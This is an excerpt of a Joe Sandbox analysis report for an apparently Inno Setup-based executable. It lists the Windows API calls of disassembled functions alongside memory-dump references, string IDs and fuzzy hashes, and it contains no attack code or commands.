                                                                              • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052C7,?,00000000,004053A6), ref: 0040521A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2938622978.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2938590960.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2938647502.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2938666772.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: InfoLocale
                                                                              • String ID:
                                                                              • API String ID: 2299586839-0
                                                                              • Opcode ID: aeae165a0667224cac4d27e5e834f0a87ce76ef06cf9607ed78754c9c470ac4f
                                                                              • Instruction ID: f5e54e9283223dc3068d295e9d46a059fb55c29f9ef527c49189185961fa2cd4
                                                                              • Opcode Fuzzy Hash: aeae165a0667224cac4d27e5e834f0a87ce76ef06cf9607ed78754c9c470ac4f
                                                                              • Instruction Fuzzy Hash: 42E0927170021426D710A9A99C86AEB735CEB58310F4002BFB908E73C6EDB49E844AEE

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,?,00409C60), ref: 00404582
                                                                              • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040458F
                                                                              • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 004045A5
                                                                              • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 004045BB
                                                                              • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00409C60), ref: 004045C6
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2938622978.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2938590960.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2938647502.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2938666772.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$HandleModulePolicyProcess
                                                                              • String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
                                                                              • API String ID: 3256987805-3653653586
                                                                              • Opcode ID: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
                                                                              • Instruction ID: 1f393095ee8ecda9e1e01b6ca7d440447e938bbc9796bcd5dbe8d266940e5f64
                                                                              • Opcode Fuzzy Hash: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
                                                                              • Instruction Fuzzy Hash: 5FE02DD03813013AEA5032F20D83B2B20884AD0B49B2414377F25B61C3EDBDDA40587E

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • SetLastError.KERNEL32 ref: 0040A0F4
                                                                                • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B240,?,02147C4C), ref: 0040966C
                                                                              • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040A131
                                                                              • SetWindowLongA.USER32(00010432,000000FC,00409918), ref: 0040A148
                                                                              • RemoveDirectoryA.KERNEL32(00000000,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A234
                                                                              • 73A25CF0.USER32(00010432,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A248
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2938622978.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2938590960.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2938647502.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2938666772.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLastWindow$CreateDirectoryLongRemove
                                                                              • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                                              • API String ID: 3341979996-3001827809
                                                                              • Opcode ID: ff5240215ae095aa9b4c4a215acc78376c38d873abd9103a02ae82a1cd1baadb
                                                                              • Instruction ID: 62af14def8aeee2ea33bef9e9495f996c0b53bf3921735d96bebdf7865f105d0
                                                                              • Opcode Fuzzy Hash: ff5240215ae095aa9b4c4a215acc78376c38d873abd9103a02ae82a1cd1baadb
                                                                              • Instruction Fuzzy Hash: 88412A70A00205DFD704EBA9EE86B997BA5EB45304F10427BE510BB3E2DB789801CB5D

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,00409C74), ref: 004090C4
                                                                              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090CA
                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,00409C74), ref: 004090DE
                                                                              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090E4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2938622978.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2938590960.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2938647502.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2938666772.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: AddressHandleModuleProc
                                                                              • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                                              • API String ID: 1646373207-2130885113
                                                                              • Opcode ID: 155d58a6923ed0f3d568bab0c15f5a63075791531f7a431787b3bda64a379594
                                                                              • Instruction ID: 472eec0154f0d1c01dfbc71f8259101f76790119bc09363f7f111e724705e506
                                                                              • Opcode Fuzzy Hash: 155d58a6923ed0f3d568bab0c15f5a63075791531f7a431787b3bda64a379594
                                                                              • Instruction Fuzzy Hash: 35015E70608342AEFB00AB729C4AB163A68E786714F60447BF5447A2D3DABD4C04CA6D

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040A131
                                                                              • SetWindowLongA.USER32(00010432,000000FC,00409918), ref: 0040A148
                                                                                • Part of subcall function 00406B7C: GetCommandLineA.KERNEL32(00000000,00406BC0,?,?,?,?,00000000,?,0040A1B9,?), ref: 00406B94
                                                                                • Part of subcall function 004099A4: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,02147C4C,00409A90,00000000,00409A77), ref: 00409A14
                                                                                • Part of subcall function 004099A4: CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,02147C4C,00409A90,00000000), ref: 00409A28
                                                                                • Part of subcall function 004099A4: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A41
                                                                                • Part of subcall function 004099A4: GetExitCodeProcess.KERNEL32(?,0040B240), ref: 00409A53
                                                                                • Part of subcall function 004099A4: CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,02147C4C,00409A90), ref: 00409A5C
                                                                              • RemoveDirectoryA.KERNEL32(00000000,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A234
                                                                              • 73A25CF0.USER32(00010432,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A248
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2938622978.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2938590960.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2938647502.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2938666772.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: CloseCreateHandleProcessWindow$CodeCommandDirectoryExitLineLongMultipleObjectsRemoveWait
                                                                              • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                                              • API String ID: 978128352-3001827809
                                                                              • Opcode ID: 3ce92308695c04860824dfce5aa5e2a114d86b56cf9c04c501a2286e8a3fa09c
                                                                              • Instruction ID: 1dc8ba1ebca63e4a13c0cdd659cb6d357c5997a84de4409b1b672f339ad13816
                                                                              • Opcode Fuzzy Hash: 3ce92308695c04860824dfce5aa5e2a114d86b56cf9c04c501a2286e8a3fa09c
                                                                              • Instruction Fuzzy Hash: 75411970A04205DFD714EBA9EE85B993BA5EB88304F10427FE510B73E1DB789801CB9D

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,02147C4C,00409A90,00000000,00409A77), ref: 00409A14
                                                                              • CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,02147C4C,00409A90,00000000), ref: 00409A28
                                                                              • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A41
                                                                              • GetExitCodeProcess.KERNEL32(?,0040B240), ref: 00409A53
                                                                              • CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,02147C4C,00409A90), ref: 00409A5C
                                                                                • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B240,?,02147C4C), ref: 0040966C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2938622978.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2938590960.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2938647502.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2938666772.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: CloseHandleProcess$CodeCreateErrorExitLastMultipleObjectsWait
                                                                              • String ID: D
                                                                              • API String ID: 3356880605-2746444292
                                                                              • Opcode ID: 770d44ed1041ee64a7928381d07257c9c34427f090ab778ebb374fa24b7d9dff
                                                                              • Instruction ID: 0d26ff0b069f05ac7fc2137d7bf6f4c2b599b29ad8a4266bf43483a79dbd8d3d
                                                                              • Opcode Fuzzy Hash: 770d44ed1041ee64a7928381d07257c9c34427f090ab778ebb374fa24b7d9dff
                                                                              • Instruction Fuzzy Hash: CB1142B17442486EDB10EBE68C52FAEB7ACEF49714F50017BB604F72C2DA785D048A69

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 00409EAB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2938622978.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2938590960.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2938647502.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2938666772.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Message
                                                                              • String ID: .tmp$y@
                                                                              • API String ID: 2030045667-2396523267
                                                                              • Opcode ID: bee86bb55ad694e4bb8d2acfeb1616fd5571fdc195b5f8f822b6cb6c9ded53ab
                                                                              • Instruction ID: 9654b09d82b51144a4098a2dc8db18680232f6f81bb165c1e960a0c4f18209d5
                                                                              • Opcode Fuzzy Hash: bee86bb55ad694e4bb8d2acfeb1616fd5571fdc195b5f8f822b6cb6c9ded53ab
                                                                              • Instruction Fuzzy Hash: 6F419F30600204DFC715EF29DE91A5A7BA6FB89304B10453AF801B73E2DB79AC01DBAD

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 00409EAB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2938622978.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2938590960.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2938647502.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2938666772.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Message
                                                                              • String ID: .tmp$y@
                                                                              • API String ID: 2030045667-2396523267
                                                                              • Opcode ID: 1b21aa8fed1238ce467e8651344fa0e4c36fa8da272615e6ac339cba9f98491f
                                                                              • Instruction ID: 26cc71b999f7f6bdec311d51aeea5e314170344188b91b932b157060f98f8833
                                                                              • Opcode Fuzzy Hash: 1b21aa8fed1238ce467e8651344fa0e4c36fa8da272615e6ac339cba9f98491f
                                                                              • Instruction Fuzzy Hash: C5418030600204DFC715EF29DE91A5A7BA5FB49304B10453AF801B73E2CB79AC41DB9D

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409376
                                                                              • GetLastError.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040937F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2938622978.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2938590960.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2938647502.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2938666772.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: CreateDirectoryErrorLast
                                                                              • String ID: .tmp
                                                                              • API String ID: 1375471231-2986845003
                                                                              • Opcode ID: 119d404e3ccd5ff43268e8edbbf371fc1c6e95f7b1ba86c01ca6a2cdd68a72df
                                                                              • Instruction ID: 7d66a9fb3acca2a164fab1eb31a00c007328e74e7b0c548e792a27499ccb9c3a
                                                                              • Opcode Fuzzy Hash: 119d404e3ccd5ff43268e8edbbf371fc1c6e95f7b1ba86c01ca6a2cdd68a72df
                                                                              • Instruction Fuzzy Hash: A1213574A002099BDB05FFA1C9429DFB7B9EF88304F50457BE901B73C2DA7C9E059AA5

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2938622978.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2938590960.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2938647502.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2938666772.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: FileWrite
                                                                              • String ID:
                                                                              • API String ID: 3934441357-0
                                                                              • Opcode ID: 2dcb34b7253c06e6037fe4e1c91b55c1fb8a74294a45886a788786d1cab60b08
                                                                              • Instruction ID: ef7112967ca92329f6454244f41010afd6781152a6d2bd16d4b387d8db15cd6b
                                                                              • Opcode Fuzzy Hash: 2dcb34b7253c06e6037fe4e1c91b55c1fb8a74294a45886a788786d1cab60b08
                                                                              • Instruction Fuzzy Hash: F951D12294D2910FC7126B7849685A53FE0FE5331532E92FBC5C1AB1A3D27CA847D35B

                                                                              Control-flow Graph (graph image not included; legend: Executed / Not Executed)
                                                                              control_flow_graph 387 406fa0-406ff3 SetErrorMode call 403414 LoadLibraryA
                                                                              APIs
                                                                              • SetErrorMode.KERNEL32(00008000), ref: 00406FAA
                                                                              • LoadLibraryA.KERNEL32(00000000,00000000,00406FF4,?,00000000,00407012,?,00008000), ref: 00406FD9
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2938622978.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2938590960.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2938647502.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2938666772.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLibraryLoadMode
                                                                              • String ID:
                                                                              • API String ID: 2987862817-0
                                                                              • Opcode ID: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
                                                                              • Instruction ID: 292e1fc4e19851716b0ab93d2d43454b233f1d25ff8a05a0d03104374ea2dcbc
                                                                              • Opcode Fuzzy Hash: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
                                                                              • Instruction Fuzzy Hash: D6F08270A14704BEDB129FB68C5282ABBECEB4DB0475349BAF914A26D2E53C5C209568

                                                                              Control-flow Graph (graph image not included; legend: Executed / Not Executed)
                                                                              control_flow_graph 397 40766c-407691 SetFilePointer 398 4076a3-4076a8 397->398 399 407693-40769a GetLastError 397->399 399->398 400 40769c-40769e call 40748c 399->400 400->398
                                                                              APIs
                                                                              • SetFilePointer.KERNEL32(?,?,?,00000000), ref: 0040768B
                                                                              • GetLastError.KERNEL32(?,?,?,00000000), ref: 00407693
                                                                                • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,021303AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2938622978.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2938590960.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2938647502.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2938666772.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$FilePointer
                                                                              • String ID:
                                                                              • API String ID: 1156039329-0
                                                                              • Opcode ID: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
                                                                              • Instruction ID: 64daf3b7b2b4cd691f255a674f922558070816022eb0a012369b73df1192a31e
                                                                              • Opcode Fuzzy Hash: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
                                                                              • Instruction Fuzzy Hash: B2E092766081016FD600D55EC881B9B37DCDFC5364F104536B654EB2D1D679EC108776

                                                                              Control-flow Graph (graph image not included; legend: Executed / Not Executed)
                                                                              control_flow_graph 391 40762c-40764a ReadFile 392 407663-40766a 391->392 393 40764c-407650 391->393 394 407652-40765a GetLastError 393->394 395 40765c-40765e call 40748c 393->395 394->392 394->395 395->392
                                                                              APIs
                                                                              • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00407643
                                                                              • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 00407652
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2938622978.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2938590960.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2938647502.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2938666772.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorFileLastRead
                                                                              • String ID:
                                                                              • API String ID: 1948546556-0
                                                                              • Opcode ID: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
                                                                              • Instruction ID: e2f452503b48da12a69c10a9d1416f2aa512a4714c212e67fea7d8588799396e
                                                                              • Opcode Fuzzy Hash: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
                                                                              • Instruction Fuzzy Hash: 69E012A1A081106ADB24A66E9CC5F6B6BDCCBC5724F14457BF504DB382D678DC0487BB

                                                                              Control-flow Graph (graph image not included; legend: Executed / Not Executed)
                                                                              control_flow_graph 402 4075c4-4075e5 SetFilePointer 403 4075f7-4075f9 402->403 404 4075e7-4075ee GetLastError 402->404 404->403 405 4075f0-4075f2 call 40748c 404->405 405->403
                                                                              APIs
                                                                              • SetFilePointer.KERNEL32(?,00000000,?,00000001), ref: 004075DB
                                                                              • GetLastError.KERNEL32(?,00000000,?,00000001), ref: 004075E7
                                                                                • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,021303AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2938622978.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2938590960.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2938647502.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2938666772.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$FilePointer
                                                                              • String ID:
                                                                              • API String ID: 1156039329-0
                                                                              • Opcode ID: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
                                                                              • Instruction ID: 74cf86129294d2faf5969c20f66175129728110ffa3c668ef2bae8a95e28f18b
                                                                              • Opcode Fuzzy Hash: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
                                                                              • Instruction Fuzzy Hash: C4E04FB1600210AFDB10EEB98D81B9676D89F48364F0485B6EA14DF2C6D274DC00C766
                                                                              APIs
                                                                              • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401739), ref: 0040145F
                                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401739), ref: 00401486
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2938622978.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2938590960.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2938647502.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2938666772.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Virtual$AllocFree
                                                                              • String ID:
                                                                              • API String ID: 2087232378-0
                                                                              • Opcode ID: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
                                                                              • Instruction ID: 29306f1da17679ce7d7d3cecb65679b0075e6f6f2ddca0a826851c871ac90975
                                                                              • Opcode Fuzzy Hash: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
                                                                              • Instruction Fuzzy Hash: 57F02772B0032057DB206A6A0CC1B636AC59F85B90F1541BBFA4CFF3F9D2B98C0042A9
                                                                              APIs
                                                                              • GetSystemDefaultLCID.KERNEL32(00000000,004053A6), ref: 0040528F
                                                                                • Part of subcall function 00404CCC: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00404CE9
                                                                                • Part of subcall function 004051FC: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052C7,?,00000000,004053A6), ref: 0040521A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2938622978.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2938590960.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2938647502.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2938666772.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: DefaultInfoLoadLocaleStringSystem
                                                                              • String ID:
                                                                              • API String ID: 1658689577-0
                                                                              • Opcode ID: b3b1cc4509b278e8422c820c611847d06614f75bfee0a937bc817707f8d770d6
                                                                              • Instruction ID: 2407abf821673f044c2d0b48b7a4a38d2d1f2757cafa01d062fe92b1f2c090cc
                                                                              • Opcode Fuzzy Hash: b3b1cc4509b278e8422c820c611847d06614f75bfee0a937bc817707f8d770d6
                                                                              • Instruction Fuzzy Hash: 73314D75E0010AABCB00DF95C8C19EEB379FF84304F158977E815BB285E739AE059B98
                                                                              APIs
                                                                              • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2938622978.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2938590960.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2938647502.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2938666772.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: CreateFile
                                                                              • String ID:
                                                                              • API String ID: 823142352-0
                                                                              • Opcode ID: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
                                                                              • Instruction ID: d860c9bcffbd3325f9178b4d72e9b59b5a3ff3896166b15a891a1a6cde46a7a7
                                                                              • Opcode Fuzzy Hash: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
                                                                              • Instruction Fuzzy Hash: 6EE06D713442082EE3409AEC6C51FA277DCD309354F008032B988DB342D5719D108BE8
                                                                              APIs
                                                                              • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2938622978.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2938590960.0000000000400000.00000002.00000001.01000000.00000003.sdmp
